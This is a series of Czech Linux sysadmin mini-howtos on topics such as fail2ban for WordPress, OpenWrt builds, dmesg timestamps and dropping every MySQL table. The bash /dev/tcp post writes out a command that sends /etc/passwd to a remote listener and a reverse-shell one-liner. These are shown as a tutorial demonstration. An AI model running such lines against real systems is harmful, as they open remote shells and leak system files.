Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Telnet jako nástroj a protokol byl před mnoha a mnoha lety zatracen a nahrazen zejmána kvůli bezpečnostním nedostatkům protokolem ssh, což je zcela v pořádku, v mnoha současných distribucích není již dnes ani nainstalován a přitom byl běžný. Pokračování textu Linux mini-howto: Telnet ověření dostupnosti služeb
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Proč? Základní představa o bezpečnosti serverů je často mylná nebo žádná, tímto soupisem praxí ověřených pravidel se jí pokusme nastínit, v některých případech jde obecná pravidla platná napříč světem IT v jinde cílíme přímo na UNIX systémy, znovu připomínáme jde o takový dobrý základ od čeho se odrazit a v případě zájmu můžeme pokračovat dalším dílem.
Bezpečnost IT systémů není stav, je to neustálý proces a i z toho důvodu je 100% zabezpečení přelud, kterého nelze dosáhnout, ale můžeme se k němu zkusit přiblížit, jediný bezpečný systém je ten který nemáte ala jediné auto které Vám nezestárne je to které jste si nekoupili.
Pokračování textu Linux mini-howto: Základní pravidla bezpečnosti serverů
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Důvod proč blokovat přístup ke službám ze sítě Tor je na Vašem rozhodnutí a není předmětem tohoto článku.
Tor je anonymizační nástroj (software) maskující skutečný pohyb uživatele po internetové síti, ukrývající skutečnou IP adresu případně další informace, které mohou umožnit jeho sledování.
Pokračování textu Linux mini-howto: Blokujeme TOR EXIT nodes
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Triviální instalace rožšíření dbase pro PHP z online repozitáře PECL (PHP Extension Community Library), dříve bylo dbase přímo součástí PHP a v samotném Debianu byl jednoduše balíček php-dbase, bohužel to je dávno minulost.
Dbase byl jeden z prvních masově používaných databázových systémů v 80. a 90.letech se kterých jsem také potkal, práce s nástrojem Foxpro a “obávané” soubory s příponou .dbf jsou již dnes povětšinou minulostí, né však úplnou mrtvolou, občas narazíte na nějakou tu oživlou.
Instalace je opravdu, ale opravdu jednoduchá, nainstalujeme potřebné nástroje pro překlad modulů PHP a zavoláme instalátor PECL (vlastně původní PEAR), ten udělá kompilaci rozšíření a je téměr hotovo.
root@www:~# apt-get install php5-dev root@www:~# pecl install dbase
Poslední úkonem je vytvoření symlinků na dbase.so (modul) a dbase.ini v /etc/php5/mods-available/ nebo si ho zaveďte natvrdo do svého php.ini, nezapomenout reloadnout Apache nebo PHP-FPM či cokoliv co používáte.
Hotovo, jednoduché! Užívejte moudře a díky za pozornost.
František Havel, MOJEservery.cz
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Databáze MySQL/MariaDB je důvěrně známá a napříč opensource světem široce používaná, obsahuje dva jednoduché SQL příkazy DROP TABLE a DROP DATABASE pro smázení tabulky či celé db.
Bohužel/bohudík neexistuje žadný příkaz “DROP ALL TABLES” ve smyslu smaž všechny tabulky v aktuální db.
Když už narazíte na “zkryplený” návrh celé DB, kde si původní autor dohání potřebu řádků a relací množstvím a tabulek a jejich jméno používá jako klíč je na čase po notné dávce relaxační hudby vymyslet jak smazat těch 1146 tabulek, jasně můžete udělat drop databases a pak create database, ale třeba to zrovna takto nechcete/nemůžete.
Varianta 1. (ktéra se mi vůbec nelíbí zápisem, ale je elegantní)
SET FOREIGN_KEY_CHECKS = 0;
SET @tables = NULL;
SELECT GROUP_CONCAT(table_schema, '.', table_name) INTO @tables
FROM information_schema.tables
WHERE table_schema = 'database_name';
SET @tables = CONCAT('DROP TABLE ', @tables);
PREPARE stmt FROM @tables;
EXECUTE stmt;
DEALLOCATE PREPARE stmt;
SET FOREIGN_KEY_CHECKS = 1;
Varianta 2. (aneb plivneme si postaru unixovsky do dlaní)
# mysqldump -u[USERNAME] -p[PASSWORD] --add-drop-table --no-data [DATABASE] | grep ^DROP | mysql -u[USERNAME] -p[PASSWORD] [DATABASE]
Hotovo! Užívejte moudře a díky za pozornost.
František Havel, MOJEservery.cz
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Byl položen jednoduchý dotaz, jak udělat výpis dmesg čitelný pro lidi ? Co lidem vadí nejvíce na výstupu dmesg je nečitelnost času, “defaultně” je místo snadno čitelného formátu času vypisován tzv. timestamp a má to svůj důvod, výstup může vypadat např. takto.
Uznávám, že to může být komplikace, ale opět platí jak kdy, např. situace kdy je potřeba zjistit čas mezi událostí A a B je při reprezentaci času formátem timestamp snadno řešitelná, pouze odečtete dvě čísla a to je snadné.
Nástroj dmesg je součástí balíku nástrojů util-linux (https://www.kernel.org/pub/linux/utils/util-linux/), kolem verze 2.20.x (rok ~ 2012) byla přidána volba pro dmesg -T (nebo –ctime), podívejme se na to.
# man dmesg --- -T, --ctime Print human readable timestamps. The timestamp could be inaccurate! --- # root@www:~# apt-cache show util-linux | grep Version Version: 2.20.1-5.3 # root@www:~# dmesg -T
Zatím to bylo vcelku snadné, ale jsou situace kdy není magický parametr k dispozici, typicky na embedded zařízení, např. OpenWrt routery s busybox nebo prostě máte starší verzi util-linux, zde si pomůžeme jednoduchým bash scriptem, uložte si ho např. do /usr/local/bin/dmesgh a nastavte ho jako spustitelný (chmod +x dmesgh), nejsem autorem, publikuji tak jak je, mám ho už roky ke spokojenosti.
#!/bin/bash
# Translate dmesg timestamps to human readable format
# desired date format
date_format="%a %b %d %T %Y"
# uptime in seconds
uptime=$(cut -d " " -f 1 /proc/uptime)
# run only if timestamps are enabled
if [ "Y" = "$(cat /sys/module/printk/parameters/time)" ]; then
dmesg | sed "s/^\[[ ]*\?\([0-9.]*\)\] \(.*\)/\\1 \\2/" | while read timestamp message; do
printf "[%s] %s\n" "$(date --date "now - $uptime seconds + $timestamp seconds" +"${date_format}")" "$message"
done
else
echo "Timestamps are disabled (/sys/module/printk/parameters/time)"
fi
Výstup je stejný jako v předchozím případě, dokonce jak je vidět ze scriptu provádí kontrolu zda-li jsou ve výstupu jádra povoleny timestamp, je možné je zcela potlačit.
#man dmesg
Studujte manuály, užívejte moudře, díky za pozornost.
František Havel, MOJEservery.cz
Nejrychlejší komplikace OpenWrt, pro úplné nováčky, nebojte se postavit si vlastní systém na míru, dle vlastních potřeb, díky automatizovanému build systému je to snadné.
Komplikaci provedeme na Debianu, budeme potřebovat cca 4GB volného místa a trpělivost, OpenWrt má vlastním buildovácí systém (Buildroot, můžete na něj narazit leckde, je to populární nástroj pro sestavení embedded Linuxu) pro cross-compile (sestavuje na x86 ale výstup poběží na jiné platformě).
Nainstaluje nezbytné věci pro překlad,vývoj a git (build-essential, ať žije síla balíčkovacích systému), poté klonujeme git repozitář OpenWrt, jdeme na to.
root@havel-machine:~# apt-get install git-core build-essential libssl-dev root@havel-machine:~# apt-get install libncurses5-dev unzip root@havel-machine:~# apt-get install subversion mercurial
Budeme stahovat tzv. bleeding edge(trunk) verzi.
havel@havel-machine:~/Work$ git clone git://git.openwrt.org/openwrt.git Cloning into 'openwrt'... remote: Counting objects: 320253, done. remote: Compressing objects: 100% (87004/87004), done. remote: Total 320253 (delta 220190), reused 318758 (delta 219174) Receiving objects: 100% (320253/320253), 112.66 MiB | 601.00 KiB/s, done. Resolving deltas: 100% (220190/220190), done. Checking connectivity... done.
Tak, máme základ OpenWrt stažen (cca 200MB), nyní potřebujeme balíčky (feeds, potravu) pro sestavení, další se budou dotahovat podle toho vše budeme chtít začlenit.
havel@havel-machine:~/Work$ cd openwrt havel@havel-machine:~/Work/openwrt$ ./scripts/feeds update -a havel@havel-machine:~/Work/openwrt$ ./scripts/feeds install -a
Tak konsole na nás hodně křičela, stáhlo se cca dalších 50MB dat, ale nebojte se ničeho, pokračuje dále k sestavení.
havel@havel-machine:~/Work/openwrt$ make defconfig havel@havel-machine:~/Work/openwrt$ make prereq havel@havel-machine:~/Work/openwrt$ make menuconfig
Po poslední příkazu se dostáváme k textovému menu, zde si vybereme co chceme sestavit, pro jakou architekturu, jaké balíčky zahrneme (ty se následně stáhnout ve formě zdrojového kódu a zkompilují), jak krásné a jednoduché.
Nejklíčovější je výběr správné cílové architektury (target), otevřete menu, vyberte Broadcom BCM2708/BCM2709 pro Raspebrry Pi 2, stejným způsobem můžete přeložit OpenWrt pro cokoliv jiného, výběr je velmi široký. 
Doporučuji si pohrát s v menu Target images -> Boot SD card partition size a Root filesystem partition size , což jsou velikosti oddílů pro boot a root, jako filesystém nechávám ext4.
V kernel -> Wireless si vyberte ovladače pro bezdratové adaptéry pokud je budete používat, já jsem si ještě začlenil VLAN (802.1q), zabbix agenta, LuCI, LuCI Asterisk, coova-chilli a pár dalších, hodí se i wpa_supplicant, obecně menuconfig je velmi bohatý projděte se ho až budete mít chvilku, vše co zaškrtáte má vliv na dobu komplikace, množství stahovaných dat i výslednou velikost image.
Jdeme buildovat (komplikovat), pozor z menuconfig vyberte Save, uložte do souboru .config a až poté exit.
*** End of the configuration. *** Execute 'make' to start the build or try 'make help'. havel@havel-machine:~/Work/openwrt$ make -j 3 make[1] world make[2] tools/install make[2] package/cleanup make[3] -C tools/patch compile make[3] -C tools/expat compile make[3] -C tools/sstrip compile make[3] -C tools/make-ext4fs compile ... čekejte a čekejte ... ... pokud jste pozorní všimnete si, že openwrt si samo sestavilo gcc (překladač, či obecně tzv. toolchain) pro své pokračování v překladu ... make[3] -C toolchain/gcc/final compile make[3] -C toolchain/gcc/final install make[2] target/compile make[3] -C target/linux compile
Hotovo, výstup (připravený image) najdete v openwrt/bin/ , OpenWrt build automaticky sestavil image pro modely Raspberry b,b+ a CM (Compute Module).
openwrt-brcm2708-bcm2708-rpi-b-ext4-sdcard.bin openwrt-brcm2708-bcm2708-rpi-b-plus-ext4-sdcard.bin openwrt-brcm2708-bcm2708-rpi-cm-ext4-sdcard.bin
Instalace, pomocí nastroje dd vemte potřebný image a zapište na SD kartu /dev/sdX , dd if=image of=/dev/sdX bs=2M a je nainstalováno.
OpenWrt obsahuje balíčkovací systém opkg, jde o repositáře s předkompilovaným software pro danou platformu, není nutné tedy software (userspace + ovladače) kompilovat pokud nechcete, ale ta možnost tu stále je. Pro úplnost, balíčky jsou soubory s koncovkou .ipk např. iperf_2.0.5-1_brcm2708.ipk.
http://wiki.openwrt.org/doc/packages
Pro Broadcom 2708 a 2709 tedy Raspberry Pi 2 použijte tento předkompilovaný repositář, nastavte si ho v /etc/opkg.con a udělejte opkg update, získáte přístup k rozsáhlému množství software.
https://downloads.openwrt.org/snapshots/trunk/brcm2708/generic/packages/base/
Hotovo, tak kompilujte, pokud bude zájem je možné si příště ukázat patchnutí a kompilace OpenWrt jako metarouter Mikrotik s instalací VoIP telefonní ústředny Asterisk, za velmi nízké náklady tak získáte router s Wifi, až ethernet 10portů pro LAN a VoIP telefony.
Užívejte moudře, díky za pozornost. František Havel, MOJEservery.cz.
Máte WordPress na vlastním serveru? Štvou Vás neustálé pokusy o uhádnutí hesla, máte plný access.log web serveru hlášek “POST http://domain/wp-login.php HTTP/1.1″ ?
Pokud používáte na server-u nástroj fail2ban můžete zkoncovat s hádáním hesel WordPressu jednou pro vždy, velmi jednoduše, pojďme na to.
Nainstalujte plugin wp-fail2ban (https://wordpress.org/plugins/wp-fail2ban/), tento plugin zajistí logování neplatných pokusů o přihlašení do Vašeho WordPress.
V logu /var/log/auth.log najdete podobné informace o pokusech o přihlášení.
Authentication failure for havel.mojeservery.cz from 46.119.117.47 Authentication failure for admin from 109.98.228.188 Authentication failure for havel.mojeservery.cz from 46.119.117.47
Přidáme filter (pravidlo) do fail2ban pro Wodpress (auth.log)(Debian a deriváty std v adresáři /etc/fail2ban/filter.d).
Ukázkový příklad filtru je přímo součástí wp-fail2ban pluginu, stáhněte si zip , rozbalte a použijte wodpress.conf.
root@www:/etc/fail2ban/filter.d# cat wordpress.conf
# Fail2Ban configuration file
#
# Author: Charles Lecklider
#
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
before = common.conf
[Definition]
_daemon = wordpress
# Option: failregex
# Notes.: regex to match the password failures messages in the logfile. The
# host must be matched by a group named "host". The tag "" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P[\w\-.^_]+)
# Values: TEXT
#
failregex = ^%(__prefix_line)sAuthentication failure for .* from $
^%(__prefix_line)sBlocked authentication attempt for .* from $
^%(__prefix_line)sBlocked user enumeration attempt from $
^%(__prefix_line)sPingback requested from $
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
Zavedení filter pravidla do fail2ban. (debian /etc/fail2ban/jail.conf přidejte)
[wordpress] enabled = true filter = wordpress logpath = /var/log/auth.log port = http,https maxretry = 3
Reload fail2ban a hotovo!
root@www:~# /etc/init.d/fail2ban restart
root@www:~# iptables -L -n Chain fail2ban-wordpress (1 references) target prot opt source destination DROP all -- 46.119.117.47 0.0.0.0/0 RETURN all -- 0.0.0.0/0 0.0.0.0/0
Hotovo, ani to nebolelo. Zmíněný postup vyžaduje přístup jako root na server, tedy na sdíleném hostingu není aplikovatelný, zde se poohlédněte po jiným bezpečnostních nástrojích (např. oblíbený Wordfence).
Užívejte moudře, díky za pozornost.
František Havel, MOJEservery.cz
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Věděli jste, že bash obsahuje build-in (vestavěné) BSD socket rozhraní dostupné skrze /dev/tcp? Pseudo zařízení slouží v bashi pro přímou interakci s TCP socketem.
havel@havel-machine:~$ exec 5<>/dev/tcp/havel.mojeservery.cz/80 havel@havel-machine:~$ echo -e "GET / HTTP/1.0\n" >&5 havel@havel-machine:~$ cat <&5 | head -n 10 HTTP/1.1 200 OK Server: nginx/1.2.1 Date: Tue, 01 Sep 2015 14:41:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.41-0+deb7u1 Vary: Accept-Encoding, Cookie Cache-Control: max-age=3, must-revalidate WP-Super-Cache: Served supercache file from PHP
havel@havel-machine:~$ cat </dev/tcp/time.nist.gov/13 57266 15-09-01 14:37:16 50 0 0 816.9 UTC(NIST) *
# Na své stroji si rozjeďte netcat root@www:/root# nc -l -p 8888 # Pošlete si co potřebujete k sobě havel@havel-machine:~$ cat /etc/passwd > /dev/tcp/havel.mojeservery.cz/8888
# Reverse shell # Na své stroji si rozjeďte netcat root@www:/root# nc -l -p 8888 havel@havel-machine:~$ bash -i >& /dev/tcp/havel.mojeservery.cz/8888 0>&1 # havel@havel-machine:~$ pwd pwd /home/havel
Pozn.: bash je nutné zkomplikovat s volbou (--enable-net-redirections).
Užívejte moudře a opatrně, díky za pozornost.
František Havel, MOJEservery.cz
Linux mini-howto? Krátce o nástrojích ze života sysadmina.
Tajné, pssst!
Nedokumentovaná (man kill) část nástroje kill, kill -0. Zcela dle neočekávání kill -0 nezabije proces, ani ho jinak neovlivní, vrací exitcode 0 pokud proces běží a akceptuje signály a naopak pokud neběží vrací 1.
havel@havel-machine:~$ echo $$ 10231 havel@havel-machine:~$ /bin/bash havel@havel-machine:~$ echo $$ 12023 havel@havel-machine:~$ kill -0 12023 havel@havel-machine:~$ echo $? 0 havel@havel-machine:~$ exit havel@havel-machine:~$ kill -0 12023 kill: kill 12023 failed: no such process havel@havel-machine:~$ echo $? 1
Seznam dostupných signálů, 0 zde není. 
K čemu je to dobré? Napadá mě, využití např. jednoduché hlídání procesů (démonů) z /var/run/xyz.pid ( #kill -0 $(cat /var/run/crond.pid) ), určitě existují jiná i lepší řešení (a nevím zda-li parsování ps je ono nebo průchod /proc/<pid>), ale jak už někdo poznamenal, proč, protože můžem.
Užívejte moudře a opatrně, díky za pozornost.
František Havel, MOJEservery.cz
